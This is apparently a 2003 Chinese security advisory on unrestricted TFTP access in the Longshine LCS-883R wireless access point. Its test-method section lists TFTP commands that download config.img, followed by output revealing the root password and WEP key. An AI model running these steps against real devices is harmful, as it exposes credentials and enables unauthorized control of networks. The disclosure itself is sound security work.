安全研究
安全漏洞
Longshine WLAN AP LCS-883R敏感信息泄露漏洞
发布日期:2003-01-06
更新日期:2003-01-09
受影响系统:LONGSHINE Technologie Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
描述:
LCS-883R-AC-B是一款由Longshine开发和维护的无线访问接入点设备。
LCS-883R-AC-B由于对tftp访问缺少正确访问限制管理,远程攻击者可以利用这个漏洞下载配置文件、获得超级用户密码、WEP密钥等敏感信息。
由于对tftp没有正确访问限制,攻击者可以通过tftp连接AP访问接入点,下载多个包含敏感信息的配置文件,其中包含WEP加密密钥,Radius服务器认证的用户名和密码等信息。利用这些信息,可以对AP接入点配置进行更改。
<*来源:Lukas Grunwald (
lukas@dnx.de)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=104187735618081&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Lukas Grunwald (
lukas@dnx.de)提供了如下测试方法:
tftp
tftp> connect 192.168.108.48
tftp> get config.img
Received 780 bytes in 1.0 seconds
tftp> quit
[~]/-\>strings config.img
DNXLABAP01 <- name of the AP
root <- name of the superuser
XXXXXX123 <- password from superuser
DNXLABLAN <- ssid
secu9 <- secret for WEP
7890abcdef <-
也可以下载如下配置文件:
config.img
wbtune.dat
mac.dat
rom.img
normal.img
建议:
厂商补丁:
LONGSHINE Technologie
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.longshine.de/浏览次数:3356
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |